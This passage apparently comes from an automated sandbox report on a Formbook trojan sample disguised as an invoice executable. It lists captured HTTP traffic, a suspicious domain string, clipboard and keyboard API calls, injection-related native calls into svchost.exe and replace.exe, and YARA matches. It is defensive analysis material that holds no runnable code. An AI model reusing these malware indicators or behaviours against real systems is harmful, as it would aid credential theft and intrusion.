6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:39 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:45 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:48 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:53 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: MUjPkRkjOWKkX.exe, 00000007.00000002.3292411346.0000000001275000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nodigitalsmoke.org
            Source: MUjPkRkjOWKkX.exe, 00000007.00000002.3292411346.0000000001275000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nodigitalsmoke.org/pnbu/
            Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: replace.exe, 00000005.00000002.3291550327.000000000259E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: replace.exe, 00000005.00000003.2706454886.000000000728B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: MUjPkRkjOWKkX.exe, 00000007.00000002.3293199751.00000000035D6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sampleStatic PE information: Filename: Revised Invoice H000127896.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C303 NtClose,2_2_0042C303
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B60 NtClose,LdrInitializeThunk,2_2_03872B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03872DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03872C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038735C0 NtCreateMutant,LdrInitializeThunk,2_2_038735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874340 NtSetContextThread,2_2_03874340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874650 NtSuspendThread,2_2_03874650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B80 NtQueryInformationFile,2_2_03872B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BA0 NtEnumerateValueKey,2_2_03872BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BE0 NtQueryValueKey,2_2_03872BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BF0 NtAllocateVirtualMemory,2_2_03872BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AB0 NtWaitForSingleObject,2_2_03872AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AD0 NtReadFile,2_2_03872AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AF0 NtWriteFile,2_2_03872AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F90 NtProtectVirtualMemory,2_2_03872F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FA0 NtQuerySection,2_2_03872FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FB0 NtResumeThread,2_2_03872FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FE0 NtCreateFile,2_2_03872FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F30 NtCreateSection,2_2_03872F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F60 NtCreateProcessEx,2_2_03872F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E80 NtReadVirtualMemory,2_2_03872E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EA0 NtAdjustPrivilegesToken,2_2_03872EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EE0 NtQueueApcThread,2_2_03872EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E30 NtWriteVirtualMemory,2_2_03872E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DB0 NtEnumerateKey,2_2_03872DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DD0 NtDelayExecution,2_2_03872DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D00 NtSetInformationFile,2_2_03872D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D10 NtMapViewOfSection,2_2_03872D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D30 NtUnmapViewOfSection,2_2_03872D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CA0 NtQueryInformationToken,2_2_03872CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CC0 NtQueryVirtualMemory,2_2_03872CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CF0 NtOpenProcess,2_2_03872CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C00 NtQueryInformationProcess,2_2_03872C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C60 NtCreateKey,2_2_03872C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873090 NtSetValueKey,2_2_03873090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873010 NtOpenDirectoryObject,2_2_03873010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038739B0 NtGetContextThread,2_2_038739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873D10 NtOpenProcessToken,2_2_03873D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873D70 NtOpenThread,2_2_03873D70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB4340 NtSetContextThread,LdrInitializeThunk,5_2_02AB4340
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB4650 NtSuspendThread,LdrInitializeThunk,5_2_02AB4650
